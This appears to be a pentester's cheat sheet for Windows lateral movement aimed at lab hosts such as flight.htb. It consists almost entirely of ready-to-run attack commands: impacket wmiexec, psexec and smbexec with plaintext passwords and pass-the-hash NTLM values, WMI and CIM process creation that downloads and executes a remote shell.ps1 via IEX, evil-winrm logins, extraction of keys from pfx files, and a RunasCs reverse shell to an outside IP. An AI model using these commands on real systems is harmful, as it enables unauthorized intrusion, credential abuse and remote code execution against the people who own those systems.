impacket-wmiexec flight.htb/admin@192.168.50.73 -password 'Frishta123!!!'
impacket-wmiexec flight.htb/admin@192.168.50.73 -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
wmic /node:192.168.50.73 /user:frishta /password:Frishta123! process call create "cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.1/shell.ps1')"
#powershell
$username = 'cube';
$password = 'Frishta123!';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$options = New-CimSessionOption -Protocol DCOM
$session = New-CimSession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$command = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.49.1/shell.ps1')"
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};
impacket-psexec flight.htb/admin@192.168.50.73 -password Nexus123!
impacket-psexec flight.htb/admin@192.168.50.73 -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
./PsExec64.exe -i \\CUBE07 -u cube\shaik -p Nexus123! cmd
evil-winrm -i 192.168.1.34 -u cube -p Frishta123!
openssl pkcs12 -in file.pfx -nocerts -out private.key -nodes
openssl pkcs12 -in file.pfx -clcerts -nokeys -out certificate.pem
evil-winrm -S -i 10.10.11.152 -u legacyy -c cert.crt -k deauthkey.key
# -S used to enable ssl
impacket-smbexec flight.htb/admin@192.168.50.73 -password Nexus123!
RunAs (Requires RDP session on one of the domain joined machines)
runas /user:cube cmd.exe
runas /user:tech\cube powershell
import-module ./Invoke-RunasCs.ps1
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"
.\RunasCs.exe c.bum test123 powershell -r 10.10.14.19:9003